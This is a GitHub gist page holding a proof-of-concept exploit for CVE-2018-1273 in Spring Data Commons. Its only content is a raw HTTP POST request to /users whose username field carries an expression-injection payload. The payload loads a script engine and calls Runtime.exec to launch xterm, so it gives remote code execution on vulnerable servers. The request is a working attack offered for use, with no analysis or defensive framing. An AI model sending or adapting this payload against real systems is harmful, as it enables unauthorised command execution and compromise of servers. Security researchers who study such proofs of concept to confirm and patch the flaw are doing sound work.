Skip to content

Instantly share code, notes, and snippets.

@xstpl
Forked from matthiaskaiser/CVE-2018-1273.http
Created August 7, 2018 00:47
Show Gist options
  • Save xstpl/fdaa86650441aae7949e6bf642a58720 to your computer and use it in GitHub Desktop.
Save xstpl/fdaa86650441aae7949e6bf642a58720 to your computer and use it in GitHub Desktop.
POC for CVE-2018-1273
POST /users HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 164
username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('xterm')")]=asdf
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment